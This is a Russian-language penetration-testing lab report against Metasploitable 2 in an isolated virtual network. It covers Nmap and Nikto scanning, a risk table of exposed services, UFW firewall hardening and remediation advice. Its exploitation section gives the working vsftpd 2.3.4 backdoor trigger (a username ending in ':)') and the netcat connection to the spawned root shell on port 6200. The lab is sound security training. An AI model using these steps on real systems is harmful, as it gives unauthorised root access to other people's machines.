
Контролируемая виртуальная лаборатория атак и защиты — эксплуатация CVE-2011-2523, разведка Nmap, сканирование Nikto, усиление защиты UFW на Metasploitable 2
Контролируемая виртуальная среда, моделирующая реальные сценарии атак и защиты
Эта лабораторная работа моделирует реальный тест на проникновение и упражнение по усилению защиты в полностью изолированной виртуальной среде. Она демонстрирует полный жизненный цикл наступательной безопасности — от разведки до эксплуатации — и защитные меры, которые смягчают каждый риск.
Ключевой результат: Получен полный root-доступ к целевой машине менее чем за 60 секунд путем эксплуатации известного бэкдора, без учетных данных и специальных инструментов.
| Компонент | Детали |
|---|---|
| Гипервизор | VMware Workstation |
| Сеть | Host-Only / NAT (полностью изолирована) |
| ОС атакующего | Ubuntu 24 LTS |
| Целевая ОС | Metasploitable 2 (Linux 2.6.x) |
| IP атакующего | 192.168.148.255 |
| Целевой IP | 192.168.148.130 |
Reconnaissance → Scanning → Exploitation → Defense & Hardening
sudo nmap -sV -O 192.168.148.130 -oN scan_before.txt
Ключевые результаты — всего 23 открытых порта:
nikto -h http://192.168.148.130 -o nikto_before.txt
Обнаружено 18 уязвимостей, в том числе:
phpinfo.php — утечка полной конфигурации сервера/doc/, /test/vsftpd 2.3.4 содержит бэкдор, внедренный в результате компрометации цепочки поставок. Отправка имени пользователя, заканчивающегося на :), заставляет сервер открыть root-оболочку на порту 6200.
# Step 1 — Trigger the backdoor via FTP
ftp 192.168.148.130
# Username: backdoor:) Password: anything
# Step 2 — Connect to the spawned shell
nc 192.168.148.130 6200
# Step 3 — Verify access
whoami
# → root
Результат: Полный доступ на уровне root получен менее чем за 60 секунд — без учетных данных, без необходимости в эксплойт-фреймворке.
Воздействие: Злоумышленник с root-доступом может читать/изменять/удалять любые файлы, устанавливать вредоносное ПО, похищать данные или перемещаться на другие хосты в сети.
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow 22/tcp # SSH only
sudo ufw status verbose
Смотрите report.md для полной оценки — полная методология, выводы команд, таблица результатов, шаги эксплуатации и все рекомендации по устранению.
Эта лабораторная работа была выполнена в полностью изолированной виртуальной среде с использованием намеренно уязвимого программного обеспечения (Metasploitable 2). Все методы предназначены только для образовательных целей и портфолио. Не повторяйте в системах, которыми вы не владеете или не имеете явного письменного разрешения на тестирование.
Автор: Amir Mohammad Marwi
| Порт | Служба | Версия | Риск |
|---|
| 21 | FTP | vsftpd 2.3.4 | 🔴 КРИТИЧЕСКИЙ — Известный бэкдор (CVE-2011-2523) |
| 22 | SSH | OpenSSH 4.7p1 | 🟡 СРЕДНИЙ — Устарел |
| 23 | Telnet | Linux telnetd | 🟠 ВЫСОКИЙ — Протокол в открытом виде |
| 80 | HTTP | Apache 2.2.8 | 🟠 ВЫСОКИЙ — Несколько CVE |
| 1524 | Bindshell | Root shell | 🔴 КРИТИЧЕСКИЙ — Открытая root-оболочка |
| 3306 | MySQL | 5.0.51a | 🟠 ВЫСОКИЙ — База данных открыта |
| 5900 | VNC | Protocol 3.3 | 🟠 ВЫСОКИЙ — Слабая аутентификация |
| 6667 | IRC | UnrealIRCd | 🔴 КРИТИЧЕСКИЙ — Известный бэкдор |
| Уязвимость | Исправление |
|---|
| Бэкдор vsftpd 2.3.4 | Обновить до vsftpd 3.x или перейти на SFTP |
| Открытая root-оболочка (порт 1524) | Немедленно отключить, проверить установку |
| Telnet (порт 23) | Отключить — использовать только SSH |
| phpMyAdmin открыт | Ограничить по IP, требовать надежную аутентификацию |
| MySQL открыт (порт 3306) | Привязать к localhost, заблокировать внешний доступ |
| VNC открыт (порт 5900) | Ограничить по IP или отключить |
| Просмотр каталогов | Apache: Options -Indexes |
| HTTP TRACE | Apache: TraceEnable off |
| Устаревшие Apache + PHP | Обновить до поддерживаемых LTS-версий |
| Инструмент | Назначение |
|---|
| Nmap | Сканирование портов и обнаружение служб |
| Nikto | Сканирование веб-уязвимостей |
| Netcat | Подключение к оболочке бэкдора |
| UFW | Конфигурация межсетевого экрана на хосте |
| FTP клиент | Запуск бэкдора vsftpd |
| VMware Workstation | Виртуализация лаборатории |